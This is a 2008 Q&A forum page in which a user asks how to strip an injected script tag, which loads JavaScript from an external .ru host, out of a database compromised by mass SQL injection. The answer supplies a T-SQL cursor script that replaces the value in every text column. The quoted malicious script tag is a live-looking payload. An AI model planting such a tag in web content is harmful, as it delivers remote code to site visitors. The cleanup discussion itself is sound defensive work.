Home > IT Answers > Security > SQL Injection Removal
Bosco322
25 pts.
 SQL Injection Removal
Database security, SQL, SQL injection, Web security
How can i remove all instances of the following from my database? <script src=http://www.jic2.ru/script.js></script> thanks Bosco

Software/Hardware used:
ASKED: September 29, 2008  7:41 PM
UPDATED: September 30, 2008  1:34 PM
RELATED QUESTIONS
Answer Wiki:
Here is some code which I've thrown together to handle this. I'll be posting it on my blog in a bit. Just set the value of the @InsertedValue variable are you should be good to go. <pre> DECLARE @sql NVARCHAR(4000) DECLARE @InsertedValue NVARCHAR(1000) SET @InsertedValue = 'The Script tags which were inserted' DECLARE cur CURSOR FOR select 'update [' + sysusers.name + '].[' + sysobjects.name + '] set [' + syscolumns.name + '] = replace([' + syscolumns.name + '], ''' + @InsertedValue + ''', '''')' from syscolumns join sysobjects on syscolumns.id = sysobjects.id and sysobjects.xtype = 'U' join sysusers on sysobjects.uid = sysusers.uid where syscolumns.xtype in (35, 98, 99, 167, 175, 231, 239, 241, 231) OPEN cur FETCH NEXT FROM cur INTO @sql WHILE @@FETCH_STATUS = 0 BEGIN exec (@sql) FETCH NEXT FROM cur INTO @sql END CLOSE cur DEALLOCATE cur</pre>
Last Wiki Answer Submitted:  September 29, 2008  10:23 pm  by  Denny Cherry   64,520 pts.
All Answer Wiki Contributors:  Denny Cherry   64,520 pts.
To see all answers submitted to the Answer Wiki: View Answer History.


RSS - Discussions Help
Discuss This Question:
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _